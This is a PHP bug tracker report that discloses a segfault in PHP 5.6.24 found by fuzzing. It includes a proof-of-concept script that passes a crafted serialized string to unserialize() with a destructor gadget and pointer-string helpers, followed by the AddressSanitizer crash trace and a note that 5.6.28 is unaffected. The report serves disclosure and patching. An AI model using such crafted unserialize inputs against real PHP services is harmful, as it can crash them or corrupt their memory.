|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2016-08-17 19:42 UTC] brian dot carpenter at gmail dot com
Description:
------------
Fuzzing PHP 5.6.24 (x64) with American Fuzzy Lop, ASAN and libdislocator.so.
Test script:
---------------
<?php
$poc='a:4:{i:0;i:0;i:1;a:1:{i:0;O:4:"ryat":2:0s:4:"ryat";R:3;s:4:"chtg";i:0;}}i:1;i:0;i:2;R:5;}';$out=unserialize($poc);gc_collect_cycles();$fa0ezval=ptr2str();$fa0ezval.=ptr2str();$fa0ezval.="0000";$fa0ezval.="\4";$fa0ezval.="000";for(;$i;){}var_dump($out[2]);class ryat{var$t;var$g;function __destruct(){$this->chtg=$this->ryat;}}function ptr2str($ptr){$out='';for(;$i<8;$i++){$out.=chr(0);$ptr=0;}return$out;}
Expected result:
----------------
No crash.
Actual result:
--------------
geeknik@debian:~/php-tmp/crashers/070816$ ./php segfault_php_var_dump
Warning: Missing argument 1 for ptr2str(), called in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2 and defined in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2
Warning: Missing argument 1 for ptr2str(), called in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2 and defined in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2
array(1) {
[0]=>
ASAN:SIGSEGV
=================================================================
==109204==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000041 (pc 0x0000012da99e bp 0x7ffd43cf3660 sp 0x7ffd43cf3560 T0)
#0 0x12da99d in php_var_dump /home/geeknik/php-5.6.24/ext/standard/var.c:119:7
#1 0x12db9a5 in php_array_element_dump /home/geeknik/php-5.6.24/ext/standard/var.c:51:2
#2 0x15f6298 in zend_hash_apply_with_arguments /home/geeknik/php-5.6.24/Zend/zend_hash.c:701:12
#3 0x12db3a4 in php_var_dump /home/geeknik/php-5.6.24/ext/standard/var.c:146:4
#4 0x12dc290 in zif_var_dump /home/geeknik/php-5.6.24/ext/standard/var.c:183:3
#5 0x184edb0 in zend_do_fcall_common_helper_SPEC /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:558:5
#6 0x17311d7 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:2602:9
#7 0x16a332e in execute_ex /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:363:14
#8 0x16a52da in zend_execute /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:388:2
#9 0x15b1cc1 in zend_execute_scripts /home/geeknik/php-5.6.24/Zend/zend.c:1341:4
#10 0x13be7f1 in php_execute_script /home/geeknik/php-5.6.24/main/main.c:2613:14
#11 0x1907aaa in do_cli /home/geeknik/php-5.6.24/sapi/cli/php_cli.c:994:5
#12 0x190474d in main /home/geeknik/php-5.6.24/sapi/cli/php_cli.c:1378:18
#13 0x7f96c62f2b44 in __libc_start_main /build/glibc-uPj9cH/glibc-2.19/csu/libc-start.c:287
#14 0x5095ac in _start (/home/geeknik/php-5.6.24/sapi/cli/php+0x5095ac)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/geeknik/php-5.6.24/ext/standard/var.c:119 php_var_dump
==109204==ABORTING
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Mon Apr 29 11:01:32 2024 UTC |
Does not affect 5.6.28, returns this error: Warning: Missing argument 1 for ptr2str(), called in /root/tmp/1.php on line 2 and defined in /root/tmp/1.php on line 2 Warning: Missing argument 1 for ptr2str(), called in /root/tmp/1.php on line 2 and defined in /root/tmp/1.php on line 2 array(1) { [0]=> &UNKNOWN:0 }